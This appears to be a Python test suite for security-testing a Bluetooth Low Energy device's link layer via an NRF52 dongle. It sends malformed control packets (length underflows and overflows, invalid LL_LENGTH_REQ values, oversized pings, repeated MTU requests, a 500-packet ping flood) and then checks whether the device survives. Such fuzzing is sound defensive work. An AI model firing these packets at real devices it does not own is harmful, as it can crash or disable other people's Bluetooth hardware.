def test_link_layer_LL_ATT_CRUSH(self):
none_count = 0
# Send feature request
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU(
) / LL_FEATURE_REQ()
self.driver.send(pkt)
log.info('Waiting for activity')
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.info('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.info("Slave RX <--- " + pkt.summary()[7:])
if LL_FEATURE_RSP in pkt:
# Here we send a key size with 253, which is way higher than the usual 16 bytes for the pairing procedure
att_mtu_req = BTLE(
access_addr=self.access_address) / BTLE_DATA(
) / L2CAP_Hdr() / ble.ATT_Hdr(
) / ble.ATT_Exchange_MTU_Request(mtu=247)
for i in range(3):
self.driver.send(
att_mtu_req
) #Send mtu request again (3 consecutive connection events)
log.info('Sending three att_mtu_req')
# pkt = BTLE(access_addr=access_address) / BTLE_DATA() / CtrlPDU() / LL_TERMINATE_IND()
# self.driver.send(pkt)
scan_req = BTLE() / BTLE_ADV(RxAdd=0) / BTLE_SCAN_REQ(
ScanA=self.master_address,
AdvA=self.advertiser_address)
self.driver.send(scan_req)
log.info(
'Disconnecting from slave'
) #Go back to advertisement channel (without sending LL_TERMINATE_IND)
#self.driver.send(scan_req) # Go back to advertisement channel (without sending LL_TERMINATE_IND)
pulse = ble.check_pulse_via_mtu_exchange(
self.driver, self.access_address)
#pulse = ble.check_pulse_via_scan(self.driver,self.master_address, self.advertiser_address)
self.assertTrue(
pulse,
"Device did not respond to provisioning. Presumed dead...."
)
break
log.info('Test Completed')
def test_link_layer_LL_CONNECTION_UPDATE_REQ_002(self):
log.info("Test CONNECTION_UPDATE_REQ UNDERFLOW")
# Internal vars
none_count = 0
# Send feature request
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU(
) / LL_FEATURE_REQ()
self.driver.send(pkt)
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.error('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.debug("Slave RX <--- " + pkt.summary()[7:])
# --------------- Process Link Layer Packets here ------------------------------------
if LL_FEATURE_RSP in pkt:
packet = BTLE(access_addr=self.access_address) / BTLE_DATA(
) / CtrlPDU() / LL_CONNECTION_UPDATE_REQ(
win_size=
2, # 2.5 of windows size (anchor connection window size)
win_offset=
1, # 1.25ms windows offset (anchor connection point)
interval=20, # 25ms connection interval
latency=3, # Slave latency (any)
timeout=55, # Supervision timeout, 500ms (any)
)
packet.len = 1 # Underflow
self.driver.send(packet)
log.info('Malformed packet was sent')
pulse = ble.check_pulse_via_mtu_exchange(
self.driver, self.access_address)
self.assertTrue(
pulse,
"Device did not respond to provisioning. Presumed dead...."
)
break
log.info("Test complete")
def test_link_layer_LL_CHANNEL_MAP_REQ_002(self):
log.info("Test CHANNEL_MAP_REQ UNDERFLOW")
# Internal vars
none_count = 0
# Send feature request
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU(
) / LL_FEATURE_REQ()
self.driver.send(pkt)
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.error('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.debug("Slave RX <--- " + pkt.summary()[7:])
# --------------- Process Link Layer Packets here ------------------------------------
if LL_FEATURE_RSP in pkt:
packet = BTLE(access_addr=self.access_address) / BTLE_DATA(
) / CtrlPDU() / LL_CHANNEL_MAP_REQ(
chM=0x0000000001,
# chM=0x1110000000, # Send to advertising channel
instant=1000)
packet.len = 1 # Underflow
self.driver.send(packet)
log.info('Malformed packet was sent')
pulse = ble.check_pulse_via_mtu_exchange(
self.driver, self.access_address)
self.assertTrue(
pulse,
"Device did not respond to provisioning. Presumed dead...."
)
break
log.info("Test complete")
def test_link_layer_LL_LENGTH_REQ_single_test_001(self):
""""Test LL_LENGTH_REQ with invalid parameters
Attack Type: CWE-20: Improper Input Validation"""
log.info("Test LL_LENGTH_REQ with invalid parameters 001")
# Internal vars
none_count = 0
end_connection = False
# Send version indication request
pkt = pkt = BTLE(access_addr=self.access_address) / BTLE_DATA(
) / CtrlPDU() / LL_VERSION_IND(version='4.2')
self.driver.send(pkt)
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.error('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.debug("Slave RX <--- " + pkt.summary()[7:])
# --------------- Process Link Layer Packets here ------------------------------------
if LL_VERSION_IND in pkt:
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA(
) / CtrlPDU() / LL_LENGTH_REQ(max_tx_bytes=0)
self.driver.send(pkt)
log.info('Malformed packet was sent')
log.debug("Attack Packet:\n" + pkt.show(dump=True))
time.sleep(1)
pulse = ble.check_pulse_via_mtu_exchange(
self.driver, self.access_address)
self.assertTrue(
pulse,
"Device not discovered during scan. Presumed dead....")
break
log.info("Test complete")
def test_link_layer_LL_PING_REQ_001(self):
""""Test LL_PING_REQ with length overflow
Attack Type: CWE-787 Out-of-bounds Write"""
log.info("Test LL_PING_REQ with with length overflow 001")
# Internal vars
none_count = 0
# Send feature request
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU(
) / LL_FEATURE_REQ()
self.driver.send(pkt)
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.error('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.debug("Slave RX <--- " + pkt.summary()[7:])
# --------------- Process Link Layer Packets here ------------------------------------
if LL_FEATURE_RSP in pkt:
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA(
) / CtrlPDU() / LL_PING_REQ()
pkt.len = 48
self.driver.send(pkt)
log.info('Malformed packet was sent')
log.debug("Attack Packet:\n" + pkt.show(dump=True))
time.sleep(1)
pulse = ble.check_pulse_via_mtu_exchange(
self.driver, self.access_address)
self.assertTrue(
pulse,
"Device did not repsond to provisioning. Presumed dead...."
)
break
log.info("Test complete")
def test_link_layer_LL_DOS_001(self):
log.info("Test LL_DOS")
# Internal vars
none_count = 0
# Send feature request
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_VERSION_IND()
self.driver.send(pkt)
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.error('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.debug("Slave RX <--- " + pkt.summary()[7:])
# --------------- Process Link Layer Packets here ------------------------------------
if LL_VERSION_IND in pkt:
for i in range(1,500):
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_PING_REQ()
self.driver.send(pkt)
log.info('Malformed packet was sent')
log.debug("Attack Packet:\n" + pkt.show(dump=True))
print("Number of packets:",i)
time.sleep(0.1)
pulse = ble.check_pulse_via_mtu_exchange(self.driver, self.access_address)
self.assertTrue(pulse, "Device did not respond to provisioning. Presumed dead....")
log.info("Test complete")
def test_link_layer_LL_LENGTH_REQ_001(self):
""""Test LL_LENGTH_REQ with invalid parameters
Attack Type: CWE-20: Improper Input Validation"""
log.info("Test LL_LENGTH_REQ with invalid parameters 001")
invalid_octets = [0,1,26,252,0xffff]
invalid_times = [0, 1, 327, 2121, 0xffff]
invalid_LL_LENGTH_REQ_inputs = [invalid_octets, invalid_times, invalid_octets, invalid_times]
#invalid_LL_LENGTH_REQ_inputs = [0, 1, 26, 252]
#perm = permutations(invalid_LL_LENGTH_REQ_inputs, 4)
# produce all permutations
perm = list(itertools.product(*invalid_LL_LENGTH_REQ_inputs))
number_of_permutations = len(perm)
log.info("Total %d Tests" % number_of_permutations)
for index, parameters in enumerate(perm):
log.info("Running Test %d of %d" % (index, number_of_permutations))
# Internal vars
none_count = 0
time.sleep(1)
# Send feature request
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_FEATURE_REQ()
self.driver.send(pkt)
while True:
pkt = None
# Receive packet from the NRF52 Dongle
data = self.driver.raw_receive()
if data:
# Decode Bluetooth Low Energy Data
pkt = BTLE(data)
# if packet is incorrectly decoded, you may not be using the dongle
if pkt is None:
none_count += 1
if none_count >= 4:
log.error('NRF52 Dongle not detected')
sys.exit(0)
continue
elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt:
# Print slave data channel PDUs summary
log.debug("Slave RX <--- " + pkt.summary()[7:])
# --------------- Process Link Layer Packets here ------------------------------------
if LL_FEATURE_RSP in pkt:
pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_LENGTH_REQ(
max_rx_bytes=parameters[0],
max_rx_time = parameters[1],
max_tx_bytes = parameters[2],
max_tx_time = parameters[3]
)
self.driver.send(pkt)
log.info('Malformed packet was sent')
log.debug("Attack Packet:\n" + pkt.show(dump=True))
time.sleep(1)
pulse = ble.check_pulse_via_mtu_exchange(self.driver, self.access_address)
self.assertTrue(pulse, "Device did not repsond to provisioning. Presumed dead....")
break
log.info("Test complete")
